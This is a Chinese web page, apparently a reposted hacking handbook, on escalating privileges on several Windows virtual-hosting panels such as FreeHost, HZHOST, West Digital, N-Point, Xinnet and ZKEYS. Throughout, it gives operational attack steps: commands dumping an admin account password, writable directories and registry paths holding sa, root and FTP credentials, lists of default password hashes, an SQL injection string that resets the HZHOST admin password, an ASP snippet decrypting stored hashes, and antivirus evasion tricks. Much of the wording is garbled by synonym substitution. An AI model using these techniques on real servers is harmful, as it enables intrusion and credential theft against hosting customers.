|
|
|
联系客服020-83701501

Win主流虚拟主机提权手册

联系在线客服,可以获得免费在线咨询服务。 QQ咨询 我要预约
Win支流虚拟主机提权手册

0x00?序言

0x01什么是虚拟主机

0x02神马是保险模式

0x03关于虚拟主机提权的一些话

0x10?星外主机提权

0x11若何识别星外

0x12成例星外提权

0x13星外可读可写

0x14其他思路星外提权

0x20华众虚拟主机提权

0x21若何识别华众主机

0x22迟钝目录及注册表

0x23一些才具和经验

0x30西部数码提权

0x31若何识别西部数码

0x32存放迟钝新闻位置

0x33一些经验

0x40?N点虚拟主机提权

0x41识别N点虚拟主机

0x42成例提权N点虚拟主机

0x43关系材料

0x50其他思空见贯虚拟主机提权

0x51新网虚拟主机

0x52?ZKEYS虚拟主机

0x53其他不无名虚拟主机

91ri补充:《HZHOST虚拟主机提权》

0x00?序言

0x01什么是虚拟主机

记妥当初才入手下手玩渗入渗出的时分,很多牛牛就在群里说道“又提一个虚拟主机”。很好奇呀,什么是虚拟主机。这里介绍介绍。百科的疏解是每个“主机”都有 独立的域名,独立的IP,即是我们所说的“空间”。而我们所往往见到的是虚拟主机上每个主机领有独立域名。总的来讲,在一台处事器上存在多个域名就叫做虚 拟主机(何等疏解就有点牵强)。思空见贯的虚拟主机管理系统即是目录中的那些~~~

0x02什么是保险模式

保险模式是虚拟机管理系对立种思空见贯的管理模式,其原理即是独霸windows下的一些设置,控制权限。

保险模式若何判断?一般虚拟主机但凡支持aspx的,但是aspx马的功能在保险模式下是不克不及完全发扬的。我们来看看保险模式下的配置:

要做设置的站点.config文件存在于:

C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\CONFIG\中
其中关头部分默许不批改是何等的

<securityPolicy>

<trustLevel?name=”Full”?policyFile=”internal”?/>

<trustLevel?name=”High”?policyFile=”站点_hightrust.config”?/>

<trustLevel?name=”Medium”?policyFile=”站点_mediumtrust.config”?/>

<trustLevel?name=”Low”?policyFile=”站点_lowtrust.config”?/>

<trustLevel?name=”Minimal”?policyFile=”站点_minimaltrust.config”?/>

</securityPolicy>

<trust?level=”Full”?originUrl=””?/>

请把稳trust?level=”Full”??:
Full即是完全权限,是系统默许设置,没有任何限制的权限,可执行aspx大马,功能没无限制。可垄断aspx一句话毗邻。

Medium,权限配置为中,国内大部分虚拟主机是何等配置的,IIS中的应用步伐配置中存在aspx映照,但没法执行任何aspx代码,何等就完全的隔离了aspx代码的执行。
High,代码会见会见权限为高,此时或许执行aspx大马,但功能遭到限制,没法执行下令、搜查注册表、系统进程、系统处事?和垄断IISSPY,一但执行以上垄断,舛误页面。

所以保险模式下的判断一般是经由aspx马来判断,一般是没法垄断iisspy,没法垄断aspxcmd,

没法读取注册表,也一般没法毗邻一句话,很多变态的设置。

这里看一张垄断iisspy泛起舛误页面的图片:

更多关于执行aspx?Webshell时泛起的舛误新闻原理详解

保险模式大部分是存在于星外主机上,其他主机泛起较少~~~

0x03关于虚拟主机提权的一些话

虚拟主机提权一般是比较蛋疼的,但是实在不是提不下去,诚然我们木有0day,但是收集新闻终究大概找到冲破口。

还有即是很多机油让我救援提权时,就说这个处事器不支持aspx,实在处事器是支持aspx的。很多虚拟主机的站点容器的设置一般即是asp和php一般是同时支持,aspx站点一般是单唯一个站点容器。所以就定然要拿下一个aspxshell,怎样找同处事器支持aspx的站点?我原本实在也说过,方式是独霸bing搜寻:ip:处事器ip??aspx

如图:

0x10?星外主机提权

0x11若何识别星外

识别星外主机,一般经由以下几个来识别:

站点目录识别,一般目录中存在freehost的基础底细但凡星外

D:\freehost\xxxxx\

Phpinfo识别新建一个php:<?php?phpinfo()?>翻开后如下:

还有即是安放目录识别:

C:\Program?Files\

C:\Documents?and?Settings\All?Users\「入手下手」菜单\步伐

这两个目录有邃晓的星外安放新闻:

0x12成例星外提权

大多数情况下各种外地提权exp一般是无果的。成例的星外的提权是独霸星外垄断自带的ftp和默许一个freehostrunat用户(administrators组),所以一旦晓得该用户密码就或许腐烂登录了。

起首找到可读可写目录大约文件,上传cmd和独霸法客器材包中的星外读IIS.exe

C:\Program?Files\iiszj.com\log\>?iis.exe?-i

FreeHost?ID:724

C:\Program?Files\iiszj.com\log\>?iis.exe?-u?724

UserName:freehostrunat

Password:?fa41328538d7be36e83ae91a78a1b16f!

如图:

成例提权即是云云。

0x13星外可读可写

由下面或许晓得,非保险模式的星外一旦找到可读可写基础底细上是秒杀。

C:\Documents?and?Settings\All?Users\Application?Data\Microsoft\Media?Index\

C:\php\PEAR\

C:\Program?Files\Zend\ZendOptimizer-3.3.0\

C:\Program?Files\Common?Files\

C:\7i24.com\iissafe\log\

C:\RECYCLER\

C:\windows\temp\

c:\Program?Files\Microsoft?SQL?Server\90\Shared\ErrorDumps\

e:\recycler\

f:\recycler\

C:\Program?Files\Symantec?AntiVirus\SAVRT\

C:\WINDOWS\7i24.com\FreeHost

C:\php\dev

C:\~1\

C:\System?Volume?Information

C:\Program?Files\Zend\ZendOptimizer-3.3.0\docs

C:\Documents?and?Settings\All?Users\DRM\

C:\Documents?and?Settings\All?Users\Application?Data\McAfee\DesktopProtection

C:\Documents?and?Settings\All?Users\Application?Data\360safe\softmgr\

C:\Program?Files\Zend\ZendOptimizer-3.3.0\lib\Optimizer-3.3.0\php-5.2.x\ZendOptimizer.dll

C:\7i24.com\LinkGate\log

C:\7i24.com\serverdoctor\log\

C:\WINDOWS\Temp\

c:\Documents?and?Settings\All?Users\Application?Data\Hagel?Technologies\DU?Meter\log.csv

c:\Program?Files\360\360Safe\deepscan\Section\mutex.db

c:\Program?Files\Helicon\ISAPI_Rewrite3\error.log

c:\Program?Files\Helicon\ISAPI_Rewrite3\Rewrite.log

c:\Program?Files\Helicon\ISAPI_Rewrite3\httpd.conf

c:\Program?Files\Common?Files\Symantec?Shared\Persist.bak

c:\Program?Files\Common?Files\Symantec?Shared\Validate.dat

c:\Program?Files\Common?Files\Symantec?Shared\Validate.dat

c:\windows\hchiblis.ibl

C:\Program?Files\Thunder?Network\Thunder7\

C:\Program?Files\Thunder?Network\Thunder\

c:\windows\DriverPacks\C\AM2

C:\Program?Files\FlashFXP\

赤色部分是我常用的一些目录和一些log文件,这些文件实在不定然要硬搬,一般是寻找log文件!!

下面的可读可写目录同样适用其他虚拟主机。

0x14其他思路星外提权

思路一:

但是叫苦连天的是今朝大部分虚拟主机基础底细但凡保险模式~~~

若何冲破?一般是只要经由第三方软件提权,思空见贯的mssql,mysql和Navicat,若何找到mssql和mysql密码,所以收集新闻就出格告急。

HKEY_LOCAL_MACHINE\SYSTEM\LIWEIWENSOFT\INSTALLFREEADMIN\11

星外存储mssql密码位置,解密后一般是没法毗邻,但是去或许用来社工。往往遇见sa密码和root密码类似,固然也或许尝尝间接用3389登录下。

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\MSFtpsvc\Parameters\Virtual?Roots\ControlSet002

星外存贮ftp密码的位置。同样是用来收集新闻。

navicat管理的MySQL处事器新闻(一般是root帐户)是存在注册内外的,详细是:

HKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Servers

导出注册表导入到本机然后星号观察就OK了。

还有即是:

navicat会把垄断日志(比如加账户)生活到My?Documents\Navicat\MySQL\logs下的LogHistory.txt,低版本是安放目录下的logs下LogHistory.txt

详细的收集新闻,请看文章:windows提权中迟钝目录和迟钝注册表的独霸

思路二:

这里收集了一些星外freehostrunat的一些密码:

fa41328538d7be36e83ae91a78a1b16f!7????默许密码

991b95d33a17713068403079d4fe40a4!7

83e0843d0091c43c4837bea224ebf197!7

7b41043919eec81c59f9eb95ac3bc456!7

4d91105ff31261b8a75a06c30002b09d!7

41328538d7be36e83ae91a78a1b16f!7

a0539224259d2494cde874f88fe86bff!7

5720969b84e8749764b39fa567331d80!7

a87997782e814aebb69b2cded123d642!7

fad7be36e83ae91a78a1b16f!7

be36e83ae91a78a1b16f!7

至于用来干什么,我想你会懂,归正我是何等失利过~~~

新思路三:

当找可读可写的目录?无意候找到了可读可写的目录也不定然能执行。也是揭示无权限?再说处事器诚然没有了360,但是还有麦咖啡跟一流监控呢,很多器械都没法上传。

未参加过滤行列的步伐间接删了都。?本人都晓得,在C:\Program?Files的文件夹有一个winrar的目录文件夹。

先用aspx大马试探下rar能否执行。

下令是:C:\Program?Files\Winrar\rar.exe或unrar.exe?如果或是正被执行的说明还是有渴想的。

在外地建设一个rar的收缩包。网罗星外exp、cmd。上传到站点的根目录。接着即是查找可写目录了。
到了这里有的人大概会说。找到了可写目录不就可执行了吗。
但有的情况大概你没有碰着过,了然揭示上传失利了的,却找不到了,无意会在执行的时会还是揭示没有权限。

接着在aspx上执行rar.exe。囚系文件 比如:x d:\freehost\wwwroot\xx.rar C:\Documents and Settings\All Users\Application Data\Microsoft\Media Index

何等rar的文件就被囚系到了media index的目录里。因为是在处事器上执行的。很多杀软不监控。

接着就到aspx那执行去了。腐烂拿到密码。

新思路四:

找到星外管理站点:

一般是这些:

C:\freehostmain\????C:\freehostmain1\

D:?\freehostmain\????D:\freehostmain1\

、、、、、

然后测验考试跳转大约拿下这个管理端,FreeHostMain?文件夹(默许是FreeHostMain),找到Global.asa文件,翻开之后会看见如下代码:

<SCRIPT?LANGUAGE=VBScript?RUNAT=Server>
Sub?Application_OnStart
SQLPassword=”abcd1234″‘为了保险,请批改数据库的登岸密码为您自己的密码,这个密码或许在SQL2000企业管理器–保险性–登岸–FreeHost用户属性中设置。

如图:

这即是星外的数据库管理密码,默赖账号=FreeHost,密码=abcd1234,然后用查问分析器毗邻。数据库中有少量的新闻~~~神马sa,root,ftp等密码都有~~

serverlist 为虚拟主机处事器列表

serversqllist 为数据库处事器列表

serverVPSlist 为VPS被控列表

servernam 为主机称说site 为站点softtype 为数据库典范榜样IP 为IPadmpass 为数据库密码

这里数据库密码或许找到悉数处事器的sa和root密码,并且还是明文的!找到了就或许经由sa回复复兴组件截至提权了。

接下去持续找表 FreeHost_Admuser,这个是星外的后援管理表段,密码是 md5 加密。

经由nmap截至扫描端口,找到http端口截至测验考试翻开,默许后援是adm

http://123.123.123.123:80/adm

固然你在后援也或许找到很多新闻~~~

小才具:

当可读可写目录存在空格的时分:

会泛起何等的情况:

‘C:\Documents’ 不是内部或外部下令,也不是可运转的步伐

或批处理文件。

解决举措是独霸菜刀的交互shell切换到exp路径,如:

Cd C:\Documents and Settings\All Users\Application Data\Microsoft 目录

然后再执行exp大约cmd,就不会存在下面的情况了,aspshell一般是没法跳转目录的~~

看图:

0x20华众虚拟主机提权

0x21若何识别华众主机

和星外识别差不多的方式,一般情况从目录就或许看出:

绝大部分情况是D:\hzhost\

还有即是这类:e:\wwwroot\longzhihu\wwwroot\

其他的判断方式即是看安放目录

C:\Program Files\

C:\Documents and Settings\All Users\「入手下手」菜单\步伐

0x22迟钝目录及注册表

就经验来讲,一般是的溢出提权对虚拟主机是无果的,并且华众又没有星外那么邃晓的缝隙。

所以华众提权关头之处即是收集新闻!!!

次要注册表位置:

HKEY_LOCAL_MACHINE\SOFTWARE\HZHOST\CONFIG\

HKEY_LOCAL_MACHINE\software\hzhost\config\settings\mysqlpass root密码

HKEY_LOCAL_MACHINE\software\hzhost\config\settings\mssqlpss sa密码

HKEY_LOCAL_MACHINE\software\hzhost\config\Settings\mastersvrpass

你会缔造他是用的自己的加密方式,然后独霸华众0day破解sa和root密码

器材下载插我吧!!

但是当初有些破解不错来,就得登录管理后援截至密码复原。虚拟主机管理目录

D:\hzhost\hzhost_master\

一般来讲是拿得到shell的。

然后独霸和sa截至提权就不详解了,详细请参考法克论坛提权文集

插我下载!!!

详细的收集新闻,请看文章:windows提权中迟钝目录和迟钝注册表的独霸

次要迟钝目录:

c:\windows\temp下有hzhost主机留下的ftp登岸记录。无效户名和密码

D:\hzhost\hzhost_master\ 虚拟主机管理站点,数据库同样存在sa和root密码

0x23一些才具和经验

经验+才具一:

在华众主机当中有很大部分的mysql用户或许跨库到mysql这个库。

在mysql这个库中有root的密码,所以当碰着华众主机的时分,如果主站是php架构的,就找下配置文件,毗邻上数据库,搜查mysql中的中root密码。

经验+才具二:

曲线提权,先拿下HZHOST域名虚拟主机管理系统!!!

起首经由旁站查问和nmap端口扫描确定管理系统登录界面。

HZHOST域名虚拟主机管理系统6.5及其畴前版本都存在登录框注入。

这里芜杂介绍下,原文请点击:HZHOST虚拟主机提权

存在注入:

123′ UPDATE [memlst] SET u_pss=’e10adc3949ba59abbe56e057f20f883e’ WHERE u_nme=’admin’–

这一句是把用户admin的密码批改成123456。管理员的后援所在一般是http://www.xx.com/master大约间接在首页登岸了按切换到管理员后援。

登录管理后援后,或许经由数据库垄断拿shell

拿到shell同样独霸sa和root密码截至提权。

0x30西部数码提权

0x31若何识别西部数码

一般是从安放目录就或许确定,安放目录d:\SOFT_PHP_PACKAGE\

站点目录没有邃晓个性

还有即是经由

C:\Documents?and?Settings\All?Users\「入手下手」菜单\步伐

这个目录截至确认。

0x32存放迟钝新闻位置

虚拟主机默许软件安放路径:d:\SOFT_PHP_PACKAGE\

在该目录下:

setup.ini??????????????????????????配置文件中记录着mysql?root?密码

site.xml???????????????????????????记录着站点配置新闻(3.0畴前)

3.0版本当初集成到了access数据库中?也是存放在?默许安放路径下的iistool.dat?文件中?用户权限也是?users组可读?何等我们就或许独霸站点shell得到到各种新闻了哈哈(这个实在是一个access数据库文件?他的毗邻密码为:www@west263@cn?)

0x33一些经验

经验一、

西部数码虚拟主机安放后默许s-u的LocalAdministrator用户密码为root3306

mysql?的root密码在安放过程中会揭示可否批改?默许也是为root3306?大约?123456

经验二、

该虚拟主机一般是未删除Wscript.Shell组建的,所以或许在asp马下截至执行下令,可读可写请参考星外主机提权这节。

西部数码的材料绝对较少,但是该虚拟主机的权限一般设置不会太死。提权还有很大的发扬。

渴想机油们多多研讨挖掘缝隙~~~

0x40?N点虚拟主机提权

0x41识别N点虚拟主机

不才面两个目录中常有npointsoft何等的目录。

C:\Program?Files\

C:\Documents?and?Settings\All?Users\「入手下手」菜单\步伐

在用户组新闻当中有何等一栏:

0x42成例提权N点虚拟主机

N点虚拟主机管理系对立般位于

C:/Program Files/

这个目录中,你或许尽心寻找。跳转到根目录,下载了数据库文件。

默许数据库路径

host_date/%23host%20%23%20date%23.mdb

找到了root的密码,不过是加密,想到N点加密的破解

N点虚拟主机加密动作是他自定义的函数,封装到了DLL轮廓,你在N点主机管理系统的目录新建一个ASP文件模式如下

<!–#include file=”inc/conn.asp”–>

<!–#include file=”inc/siteinfo.asp”–>

<!–#include file=”inc/char.asp”–>

<%

set iishost=server.CreateObject(“npoint.host”)

x=iishost.Eduserpassword(“NLFPK@OJCOCLA@E@FEKJMFADLALKLF@JHOIMAHO@LCDBAAMEOEKGKM@A”,0)

response.write x

%>

把轮廓的NLFPK@OJCOCLA@E@FEKJMFADLALKLF@JHOIMAHO@LCDBAAMEOEKGKM@A换成你得到的HASH,会见会见这个ASP文件就或许爆出来。如图:

如果那个目录没有写权限,你或许在外地自己搭建一个N点虚拟主机系统,然后把这个文件写到管理目录下面就或许了

其他,MYSQL,MSSQL和FTP密码都以这类模式加密,同样的或许截至解密。

0x43关系材料

材料一、

一般n点虚拟主机是或许aspx的iisspy,或许间接找到n点虚拟主机管理系统的站点根目录。同样也或许搜查系统新闻,用户新闻等

材料二、

一般n点虚拟主机会备份mysql目录,一般在D盘根目录,一般是有可读权限的,或许会见会见下载user文件截至破解root密码。

材料三、一般情况下,有n点主机就有phpmyadmin,或许经由phpmyadmin的关系缝隙截至渗入渗出提权得到root密码等。

0x50其他思空见贯虚拟主机提权

0x51新网虚拟主机

新网虚拟主机识别一般是经由站点目录识别:

D:virtualhost\xxx\www

今朝新网虚拟主机多泛起在windows2008+iis7上,win2003上当初越来越少,win2003的情况,一般经由找root和sa密码提权,配置不阴险时用溢出都或许提权。

约莫反面的支流即是新网+win2008+iis7

这里就要介绍appcmd

appcmd list site

列出站点及其id号

第二个下令:

appcmd list config

列出悉数站点配置新闻,如果是在iis7上配置的ftp,则还会列出站点ftp用户及密码

第三条下令:

appcmd list vdir

该条下令或许列出id号和悉数站点的目录

经由上述下令或许跨到其他站点目录收集新闻~~~

关于跨目录的介绍:详谈若何找到目标站目录

0x52 ZKEYS虚拟主机

迟钝目录及新闻

注册表位置:

HKEY_LOCAL_MACHINE\SOFTWARE\ZKEYS

一般都在硬盘的根目录

迟钝目录:

翻开*\ZKEYS\Setup.ini

1.[Mysql] (MYSQL设置)

2.root=aaa (管理员帐号)

3.RootPass=123 (管理员密码)

4.[Mssql] (MSSQL设置)

5.DbPath=d:\MSSQL\Data (MSQL数据库存放路径)

6.SA=aaa (管理眼帐号)

7.SaPass=123 (管理员密码)

Guid=www.chouwazi.com |XXXXXX 主机系统的 IP 授权 和 密码,下面即是看出比较鸡肋了。

要记住mysql是在mysql_zkeys MySqlUserBySH保险账户下运转的mysql_zkeys是属于guest组权限的,MySqlUserBySH属于users组,而 mssql 就更惨剧了 保险配置很牛叉。

不过值得道贺的一点,国内的网管都LOVE通用密码,一般拿到 root 密码 社到管理的账号

phpmyadmin 在 127.0.0.1:999 端口,必要的时分或许测验考试。

其他:

找找有木有win站点mail ,这个器械有的 zkeys 装了,有的没装,如果找到这器械间接去他目录写个 shell,权限就比曩昔大了,exp 也能提了。

默许目录 d:\win站点mail\站点\

只要有这器械就好办,或许写 lpk,大约变卦轮廓的 exe 啥的都行。

0x53其他不无名虚拟主机

还有存在的虚拟主机即是:

万网虚拟主机

Prim@Hosting虚拟主机

还有各种星外分支~~~

虚拟主机提权遵循的原则是尽大概的收集新闻,一般是从注册表,虚拟主机管理系统的数据库,迟钝目录,备份文件,日志新闻等中收集!!!

还有一个要提到的是,实在不是每个虚拟主机都能提权,大约说实在不是每个虚拟主机都要提权。

如果你有目标站,大可不必第一决定提权,或许起首找到目标在目录,经由一些才略获得目标站的shell大约数据库新闻等,直到拿到目标在权限~~~

随着提权才略日趋更新,方式也会越来越多,91ri.org在这里也再分享一个提权思路:http://www.91ri.org/1441.html 渴想本人多多收集,领取囊中!!

作者:yueyan 转自f4ck由网络保险攻防研讨室(www.91ri.org)新闻保险小组收集整理,转载请注明出处。

数安新闻+更多

证书相关+更多